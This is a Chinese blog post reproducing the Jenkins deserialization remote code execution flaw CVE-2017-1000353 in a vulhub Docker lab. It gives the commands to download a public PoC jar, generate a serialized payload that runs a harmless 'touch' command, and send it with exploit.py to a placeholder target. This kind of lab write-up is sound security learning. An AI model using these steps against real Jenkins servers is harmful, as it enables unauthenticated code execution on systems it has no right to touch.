Jenkins 远程代码执行漏洞 CVE-2017-1000353 复现

水下月 2021-01-29
Web安全 发布于 2021-01-29 14:17:27 阅读 100 评论 0

漏洞原因

Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限

漏洞范围:

Jenkins影响(包括<=2.56)
Jenkins LTS 影响( 包括<=2.46.1)

漏洞环境搭建

使用阿里云vulhub和docker搭建环境
cd /vulhub/jenkins/CVE-2017-1000353
docker-compose up -d

漏洞复现

wget https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar

获取CVE-2017-1000353这是生成POC的工具

执行下面命令,生成字节码文件:

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py

下载https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py,python3执行python exploit.py http://your-ip:8080 jenkins_poc.ser,将刚才生成的字节码文件发送给目标:


进入docker,/tmp/success成功被创建,说明命令执行利用成功:

jenkins 远程代码执行漏洞 网络安全 漏洞
本作品采用《CC 协议》,转载必须注明作者和本文链接
水下月
32 声望
暂无个人描述~
讨论数量: 0
排序:
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!
支持 MD 帮助
水下月
未填写
  • 作者发布文章13
  • 作者收获粉丝0
  • 作者收到点赞5
  • 所有文章被收藏了0
  • 博客总访问量排行第11
  • 博客总访问量2820(每日更新)
文章归档
5 2021 年 2 月
6 2021 年 1 月
2 2020 年 11 月
查看所有博文
最新 最受欢迎
MySQL 身份认证绕过漏洞(CVE-2012-2122)复现 [1天前]
flask-ssti 漏洞复现 [4天前]
Shellshock 破壳漏洞 CVE-2014-6271 复现 [5天前]
CVE-2016-4437 (Apache Shiro 反序列化漏洞) 复现 [6天前]
flask 服务端模板注入漏洞复现 [2周前]
Jenkins 远程代码执行漏洞 CVE-2017-1000353 复现 1
cve-2017-12149 JBOOS 反序列化漏洞复现 1
CVE-2014-0160 心脏滴血漏洞复现 1
身份认证绕过漏洞复现 CVE-2012-2122 1
CVE-2019-11043 远程代码执行漏洞复现 1
© 2021 WANGAN.COM 帮助网安从业者成长;关注产业发展,做网络安全忠诚卫士!